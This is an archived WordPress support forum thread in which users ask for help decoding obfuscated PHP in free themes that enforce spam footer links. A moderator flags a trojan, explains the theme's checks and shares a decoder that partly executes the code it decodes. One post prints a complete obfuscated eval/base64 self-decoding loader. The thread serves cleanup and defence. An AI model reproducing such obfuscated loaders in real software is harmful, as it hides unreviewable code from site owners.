WordPress.org

Ready to get started?Download WordPress

Forums

[closed] Encrypted Theme? Here's how to decode it. (195 posts)

  1. Claritty
    Member
    Posted 4 years ago #

    hey for some reason, none of the mentioned stuff above seem to be able to decode my footer.php, I wanna put a Donate button there, but I have had no luck with that so far, lol.

    http://wordpress.pastebin.com/m33b76155
    Thats my code, any help is great appreaciated.

  2. gazouteast
    Member
    Posted 4 years ago #

    Hi Otto

    Generally speaking I usually manage to figure things out myself after lots of trial and error, but this one has got me completely beaten.

    http://wordpress.pastebin.com/mc2bad80

    It's the entire contents of a file called validator.php and was accompanied with an encrypted footer which I've decrypted (nothing dangerous) and a checksums.md5 file in which none of the checksums match anything in the code linked above.

    All of them came within the zip package for a theme.

    I'd really appreciate your help decrypting the file above

    Many thanks
    Gaz

  3. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    gazouteast: Delete the file, it's a trojan. I didn't decode it fully, but I did find some contents, including the phrase "I hax0r you", so I'd just get rid of it.

  4. amcobb
    Member
    Posted 4 years ago #

    Hi,

    This is driving me crazy! In addition to this thread, I have read tons of stuff online but I'm confused and must ask for help. I'm sure this is an easy fix that is probably already listed here and I'm just not getting it so I'm hoping someone can help me? Here's the deal....

    I am using a them from http://www.newwpthemes.com. The BlackPink theme, to be exact. There are links in the footer that I would like to remove. I don't mind giving credit to the author but these are not author related links. If I change the footer, the theme locks me out of admin panel and the site. It throws up a note that says: This theme is released free for use under creative commons licence. All links in the footer should remain intact. These links are all family friendly and will not hurt your site in any way. This great theme is brought to you for free by these supporters.

    There are also static links but I'm not sure all of them need to be removed. I found all of the encrypted code and static links using the TAC plugin. I have copied each of the encrypted codes and the static link information to here: http://wordpress.pastebin.com/m19fa7e24

    Can someone please give me the step by step to get rid of the footer links and then to clean up any of the static links that need to be cleaned up? I think that I probably only need to clean up the first static link that is listed but I would rather let whoever helps me decide about the rest of it.

    Thank you in advance!

    Angelina

  5. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    amcobb: My advice would be to simply not to use that theme, or any other themes from that site. They're probably stolen from elsewhere anyway. I'd search for the original theme that they modified to include their spam and us that instead.

    However:

    1. This is a bit of code that displays the theme license message.
    2. This is a bit of code that checks to see if your footer has changed.
    3. Calls #4.
    4. Makes the theme fail if you remove #5 or #6.
    5. Makes the theme fail if you remove #2 or #4.
    6. Checks to make sure the functions.php file is not removed.

    So, if you remove ALL of those encrypted bits, then it should work okay.

  6. amcobb
    Member
    Posted 4 years ago #

    Otto,

    Thank you! It worked fantastically!

    :)
    Angelina

  7. Gady
    Member
    Posted 4 years ago #

    How to decrypt those parts of the thema ?
    We here index page and Footer and I would like to decrypt them, or me and tell me how can I decrypt them.
    Thanks in advance!

    This is the index page

    Code removed by mod.

  8. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    Gady: The very first post in this thread contains links to decode the code you specified. Use those automatic decoders instead of posting the code here.

  9. Skedar
    Member
    Posted 4 years ago #

    Dont work for me...

    code removed by mod

    someone help me?

  10. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    Skedar: I just tested it, and that code you posted DOES work with the existing decoder that I put in the first post. Just go to the link and follow the instructions.

    Remember, you're not going to copy and paste the whole thing, only part of it. Read the instructions closely.

  11. Skedar
    Member
    Posted 4 years ago #

    hmm, Ok

    sry man x.x"

  12. gazouteast
    Member
    Posted 4 years ago #

    Hi Otto

    Thanks for the heads-up, I've only just returned to this thread and have deleted the entire theme immediately. Am now running ClamAV over the whole home directory - can you think of anything else I should do just in case?

    Gaz

  13. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    I have a little bit of info on the topic of being hacked here: http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

    But the short of it is that you need to look through your files for anything that seems out of place. Hacks like those usually insert backdoors, and a virus scanner isn't going to find those.

  14. Heartlander
    Member
    Posted 4 years ago #

    No problem decoding, but how are we going to REMOVE all instances of the code?
    Wrapping with a start and end footer tag doesn't work on my template.

    This is driving me mad!

  15. Bektor
    Member
    Posted 4 years ago #

    Could you help me pls? i´ve tried but i can´t , sorry , its my firs time

    code removed by mod, use the decoder yourself

  16. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    Bektor: I just tested it, and that code you posted works with the existing decoder that I put in the first post. Just go to the link and follow the instructions.

    Remember, you're not going to copy and paste the whole thing, only part of it. Read the instructions closely.

  17. tonjiboy
    Member
    Posted 4 years ago #

    Otto

    You're obviously a pro when it comes to this and i'm at the end of my rope. I tried using your great decoder for this and it came up with more gibberish so obviously i'm doing something very wrong. I tried the Byterun decoder because it seemed like it followed that format but came up empty. The Base64 decoder just spit out more gibberish. Here's the stuff i'm trying to decode.

    http://wordpress.pastebin.com/m7f347543

    Any help you could give me would be greatly appreciated.

  18. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    @tonjiboy: Yeah, those types of encoding can be quite annoying sometimes.

    Here's the decoded code:
    http://wordpress.pastebin.com/m785f44b8

  19. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    Here's some generic code that should help some people with decoding code similar to the one above by tonjiboy:

    <?php
    $text = file_get_contents('test.php');
    function generic_eval_decode($input) {
    	$altered = str_replace('eval','echo',$input);
    	ob_start();
    	eval ('?>'.$altered);
    	$new = ob_get_contents();
    	ob_end_clean();
    	$altered = preg_replace('/eval.*;/', $new, $input);
    	$altered = str_replace('eval','echo',$altered);
    	ob_start();
    	eval ('?>'.$altered);
    	$new = ob_get_contents();
    	ob_end_clean();
    	return $new;
    }
    echo generic_eval_decode($text);

    That will decode a "test.php" file encoded in a similar way to the ones given that many people have a hard time with.

    Note that decoding this way is not particularly safe. The code in question gets partially run, which means that it could do anything. Nevertheless, for simple encoding methods like this one, it'll get you the original code.

  20. verilix
    Member
    Posted 4 years ago #

    Hey Otto,

    Both my Footer.php and my Index.php are encrypted. I tried all of the encoders here, and spent about 6hrs online trying for a solution, but came up with nothing.

    Footer.php:
    http://wordpress.pastebin.com/m2fe121c

    Index.php:
    http://wordpress.pastebin.com/m2977f406

    Any help you could give me with this would be greatly appreciated!
    Thanks,

  21. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    I tried all of the encoders here

    Clearly, you did not. The very first link in the very first post of this thread is a decoder that works with both of the pieces of code you just posted here.

    Use that decoder. It works.

  22. verilix
    Member
    Posted 4 years ago #

    I did. When I paste in the eval code, it just gives me back the code I placed in.

  23. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    verilix: Did you try actually reading the instructions? They're at the bottom of the page: http://ottodestruct.com/decoder.php

    That site works with your code. I just did it. It gave me the resulting decrypted code. I don't know how I can make this any clearer.

    Hint: "eval" is not what you paste into the box. Read the instructions more carefully.

  24. sigdd
    Member
    Posted 4 years ago #

    Hi Otto -

    May I apologize for my .php ignorance in advance! I'm trying to disable the encryption from footer.php and the code doesn't appear to me to match any of your "if your code looks like this" examples in the first post. Can you direct me?

    The theme seems to have two files that relate to the footer...and I'm too new at this to understand how they are relating. The 'footer.php' code is here: http://wordpress.pastebin.com/f6311dbd

    and the 'footer_content.php' code is here: http://wordpress.pastebin.com/d73a0b57e

    The footer_content file isn't encrypted...just the footer file...but I thought it might be helpful to you to see both and tell me what to do? Not sure how to decode footer and then if I'm able to...what else I might need to do to the file or the related file to accomplish?

    Happy to give the theme creator credit - just want to remove cell phone ad links and put in Google Analytics to the footer! Hope you can help me...thanks in advance!

  25. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    sigdd: You did something wrong, that second link with the footer_content doesn't work.

    The first link is undecipherable, because it's just gibberish. There's no code in there to decode it. Perhaps the second part contains that code, or perhaps there's some other code elsewhere in the theme that decodes it.

    In any case, I'd simply not use that theme. Go find the original theme from the original author. See, most themes with bad code in them like this are stolen from their original sites and then modified. Rarely do spammers like these make their own themes. No real theme author would put spammy cell phone links in their themes.

    Google for the name of theme. You'll probably find it on half a dozen spammy sites. But the original is out there somewhere. Use that one. That's my advice.

  26. phsfboys
    Member
    Posted 4 years ago #

    http://wordpress.pastebin.com/m764a7156

    <?php //
    $OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=1136;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMjg4KTskT08wME8wME8wPSgkT09PMDAwME8wKCRPTzBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDM4MCksJzNxb016dC84K0ZjeUxkQnNyNkFVU1FYYWZZNHVwRGtJbjBQVFJqd0o5VkNFVzJoWk52aTdPZTFLbG1nSDV4R2I9JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?>
    FzxsLMqsLMqsLMe7D8FIpwQNu/tTYAnJaex/ASvtae5Jyo+J+PlRUOxsLz5NU73NyP+J+PN9FzxsU73NLMqsLonRUO5NUO5NLz5Nco6sU7qsU73NLz59Fz5NLMqsLz5NLoNRUO5NLz5NLM3NcANJLKtZUaVOy7nE6wdmU/6opK+1rQQUSQ00YjRODaqz4OjhLtqSSwVKATjXrOQaLw04UJYVdOxjLS2WuXD+da08fTOJyoDqrRdz6SY8AzjcAOvdURxrSQFUQtQXQe0YXwtPf16jYwD94XVEu/ehuKqvpJdODaYKk8jgLMziL7redTplBAWZFiRVcARHYwdWuKdjco6sLM3NU7qsLM3VB1Q1fXN9FzxsLMqsLMqsLoRHYXd9ui3JsoxR4afG+MN0yAOnYXmR+od2fXjhyXtiYXznyAOGMr9ForRFMr9ForR5y16VDTlnsoz2yAqjuwrn+1dZuJ6juJrnyAOGMr9FoUNZY/j1sP35+AO2+/QhYo3Tf1xhD/QhD8Difa3nyAOGMr9ForOcorR5Y/j1+/jRsAFwu1xOYa+2D1jRY1QOpieKpwtN+TldonRFoUvR4afn4Xrx+wYZuK6jpPeK4X6JYa67+PqTu/t7p7OPf1vjfaFw4anPsnOcorRFMr9ForRFF72VYP39+otwDXmTD/jZujxjk/j7D8L9F16muwt24XdIp1jRYXF0pPpV+8v5+X6muwt24XdIp1jRYXF0pPnJ6wxZD/QiFiRncA3g+M2jf10Z+opnMr9ForRFF72juw6VYTWHYXd9ui3JorRForOcorRFsoxR4afG+MN0yAOnYXmR+odwu1xOYa+2D1jRY1QOpi32yUldonRFsoxR4afG+MN0yAOnYXmR+odwu1xOYa+2D1jRY1QOpieKpwtN+oO2snOcorRdonRFs/6VDPqVYMOPYwxZD/Qi+TldonRFoUvN+/jRsAFTuKqmpwjJ48rPsPpHa1S9FeqZD1QiYXrnfJRnFiNJU1mS4/Q8uipVB72jf10Z+op5fAq9pwQwsAF9D86NBP5ZYimO4ixKpo+GQ1xiYtqiYad7sox0sPq5+Mv0+/0iYXfx+w0OD83gyixO4/Q2YaLhD1QPuKRhuKFJ+TmauKFRS8FjpKLnQ/0juXQ7sox0sP3JBexjcoDzYadVY1mjYoqPkA3JyoDsuj69YSDZFiRHB1QT4/5nF7v0+/0iYXfx+w0OD83gyixju/QJfXmOD/0juXQ7ywdZuA+G6XvjY1thDoqS4/Q2YaL5y1zGsoxNsnOcorR5y16VDTlnsoz2yAqjuwrn+1YZuK6jpP32yUldonRFMr9FsoxR4afG+MN0yAOnYXmR+/dZuJ604XmjpP32yUldonRForRdonRJB1jhf1veY/S9QzQdSzvqQzQrrQ6++olJy1jhf1veY/Q7yKdTpwjND8Lhp/0NFiRHB1QT4/5nFNOcF72Kptxwu1xOYa+9cUWHYXd9ui3JorOcsoxPu16msnOcsox9D/eWsPpH

    Can someone help me decode the above footer content.
    I tried doing all sort of decoders, but was not able to get the right one.

    I am in a urgent need of this. Would be great if someone could help.

    Thanks a million in advance.

  27. sigdd
    Member
    Posted 4 years ago #

    Hi Otto -

    Dang-nabbit. I don't know what I did wrong on the 2nd post, but have reposted in hopes that you'll take a look at it and be able to tell me if the footer is modifiable. I've scoured the net for all sources of the theme -- the first I got off of WordPress's site - but couldn't get the footer off that one either - so then did the one I'm using now. I've customized it a lot in the CSS - so re-doing will be a bear...but I know I might need to. Theme is called 'techified', by the by.

    Would you be willing to look at my repost of footer_content, now CORRECTLY available at http://wordpress.pastebin.com/df858a44 and tell me if you think there is something I can change in there to get rid of all that horrible cell phone junk?

    If it's as big of a mess as the footer - then I'll sadly start the quest for a new theme...but will cross my fingers in the meantime! :)

  28. conorp
    Member
    Posted 4 years ago #

    Hey guys.

    My entire server was infected with this: http://pastebin.com/m7b5d7722

    Any ideas on how to decode it?

  29. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    phsfboys: This is not an exact decoding, as the file included a bunch of annoying newline characters built in and i didn't bother replacing them. It should be enough for you to work with. http://wordpress.pastebin.com/m1af10af9

    sigdd: Still nothing at that link you gave. Dunno what the issue is there.

    conorp: There's nothing there worth decoding, it's just spam. Delete it outright.

  30. brainsplus
    Member
    Posted 4 years ago #

    I was trying to preview my site and all of sudden I had this message below, I can long into my back office to change anything, how do I resolve this. Here is the message below ...

    Zend Optimizer not installed
    This file was encoded by the Zend Encoder / Zend SafeGuard Suite

    In order to run it, please install the freely available Zend Optimizer, version 2.1.0 or later.

    What is the Zend Optimizer?
    The Zend Optimizer is one of the most popular PHP plugins for performance-improvent, and has been freely available since the early days of PHP 4. It improves performance by taking PHP's intermediate code through multiple Optimization Passes, which replace inefficient code patterns with efficient code blocks. The replacement code blocks perform exactly the same operations as the original code, only faster.

    In addition to performance-improvement, the Zend Optimizer also enables PHP to transparently load files encoded by the Zend Encoder or Zend SafeGuard Suite.

    The Zend Optimizer is a freely-available product from Zend Technologies. Zend Technologies is the company that develops the scripting engine of PHP, also known as the Zend Engine.

Topic Closed

This topic has been closed to new replies.

About this Topic